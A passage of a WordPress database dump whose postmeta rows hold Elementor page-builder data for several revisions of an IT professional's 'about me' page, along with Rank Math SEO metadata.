(4560,846,'_elementor_version','3.28.3'),
(4561,846,'_wp_page_template','default'),
(4562,846,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"c86ec6e\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_thumbnail_size_size\":\"thumbnail\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":20,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_title_color\":\"globals\\/colors?id=text\",\"classic_meta_color\":\"globals\\/colors?id=accent\",\"classic_excerpt_color\":\"globals\\/colors?id=accent\",\"classic_read_more_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(4563,846,'_elementor_pro_version','3.28.3'),
(4564,846,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4567,847,'_elementor_edit_mode','builder'),
(4568,847,'_elementor_template_type','wp-page'),
(4569,847,'_elementor_version','3.28.3'),
(4570,847,'_wp_page_template','default'),
(4571,847,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"c86ec6e\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_thumbnail_size_size\":\"thumbnail\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":20,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_title_color\":\"globals\\/colors?id=text\",\"classic_meta_color\":\"globals\\/colors?id=accent\",\"classic_excerpt_color\":\"globals\\/colors?id=accent\",\"classic_read_more_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(4572,847,'_elementor_pro_version','3.28.3'),
(4573,847,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4576,848,'_elementor_edit_mode','builder'),
(4577,848,'_elementor_template_type','wp-page'),
(4578,848,'_elementor_version','3.28.3'),
(4579,848,'_wp_page_template','default'),
(4580,848,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\"><span aria-hidden=\\\"true\\\">With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.<\\/span><\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"c86ec6e\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_thumbnail_size_size\":\"thumbnail\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":20,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_title_color\":\"globals\\/colors?id=text\",\"classic_meta_color\":\"globals\\/colors?id=accent\",\"classic_excerpt_color\":\"globals\\/colors?id=accent\",\"classic_read_more_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(4581,848,'_elementor_pro_version','3.28.3'),
(4582,848,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4595,760,'rank_math_analytic_object_id','1'),
(4596,752,'rank_math_analytic_object_id','2'),
(4597,741,'rank_math_analytic_object_id','3'),
(4598,647,'rank_math_analytic_object_id','4'),
(4599,630,'rank_math_analytic_object_id','5'),
(4600,615,'rank_math_analytic_object_id','6'),
(4601,603,'rank_math_analytic_object_id','7'),
(4602,583,'rank_math_analytic_object_id','8'),
(4603,329,'rank_math_analytic_object_id','9'),
(4604,312,'rank_math_analytic_object_id','10'),
(4605,305,'rank_math_analytic_object_id','11'),
(4606,150,'rank_math_analytic_object_id','12'),
(4607,110,'rank_math_analytic_object_id','13'),
(4608,104,'rank_math_analytic_object_id','14'),
(4609,97,'rank_math_analytic_object_id','15'),
(4610,68,'rank_math_analytic_object_id','16'),
(4611,66,'rank_math_analytic_object_id','17'),
(4612,64,'rank_math_analytic_object_id','18'),
(4613,60,'rank_math_analytic_object_id','19'),
(4614,56,'rank_math_analytic_object_id','20'),
(4615,51,'rank_math_analytic_object_id','21'),
(4616,27,'rank_math_analytic_object_id','22'),
(4638,647,'rank_math_seo_score','26'),
(4641,647,'rank_math_internal_links_processed','1'),
(4642,851,'_elementor_edit_mode','builder'),
(4643,851,'_elementor_template_type','wp-page'),
(4644,851,'_elementor_version','3.28.3'),
(4645,851,'_wp_page_template','default'),
(4646,851,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\"><span aria-hidden=\\\"true\\\">With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.<\\/span><\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"c86ec6e\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_thumbnail_size_size\":\"thumbnail\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":20,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_title_color\":\"globals\\/colors?id=text\",\"classic_meta_color\":\"globals\\/colors?id=accent\",\"classic_excerpt_color\":\"globals\\/colors?id=accent\",\"classic_read_more_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(4647,851,'_elementor_pro_version','3.28.3'),
(4648,851,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4651,852,'_elementor_edit_mode','builder'),
(4652,852,'_elementor_template_type','wp-page'),
(4653,852,'_elementor_version','3.28.3'),
(4654,852,'_wp_page_template','default'),
(4655,852,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\"><span aria-hidden=\\\"true\\\">With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.<\\/span><\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"c86ec6e\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_thumbnail_size_size\":\"thumbnail\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":20,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_title_color\":\"globals\\/colors?id=text\",\"classic_meta_color\":\"globals\\/colors?id=accent\",\"classic_excerpt_color\":\"globals\\/colors?id=accent\",\"classic_read_more_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(4656,852,'_elementor_pro_version','3.28.3'),
(4657,852,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4660,853,'_elementor_edit_mode','builder'),
(4661,853,'_elementor_template_type','wp-page'),
(4662,853,'_elementor_version','3.28.3'),
(4663,853,'_wp_page_template','default'),
(4664,853,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\"><span aria-hidden=\\\"true\\\">With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.<\\/span><\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"c86ec6e\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_thumbnail_size_size\":\"thumbnail\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":20,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_title_color\":\"globals\\/colors?id=text\",\"classic_meta_color\":\"globals\\/colors?id=accent\",\"classic_excerpt_color\":\"globals\\/colors?id=accent\",\"classic_read_more_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(4665,853,'_elementor_pro_version','3.28.3'),
(4666,853,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4669,647,'rank_math_focus_keyword','Masoud Nikoofar,IT,Linux,Database,OS,Oracle,MySQL,SQL Server,PostgreSQL,Firewall,WAF,BCP'),
(4671,854,'_elementor_edit_mode','builder'),
(4672,854,'_elementor_template_type','wp-page'),
(4673,854,'_elementor_version','3.28.3'),
(4674,854,'_wp_page_template','default'),
(4675,854,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\"><span aria-hidden=\\\"true\\\">With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.<\\/span><\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"c86ec6e\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_thumbnail_size_size\":\"thumbnail\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":20,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_title_color\":\"globals\\/colors?id=text\",\"classic_meta_color\":\"globals\\/colors?id=accent\",\"classic_excerpt_color\":\"globals\\/colors?id=accent\",\"classic_read_more_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(4676,854,'_elementor_pro_version','3.28.3'),
(4677,854,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4680,855,'_elementor_edit_mode','builder'),
(4681,855,'_elementor_template_type','wp-page'),
(4682,855,'_elementor_version','3.28.3'),
(4683,855,'_wp_page_template','default'),
(4684,855,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elTy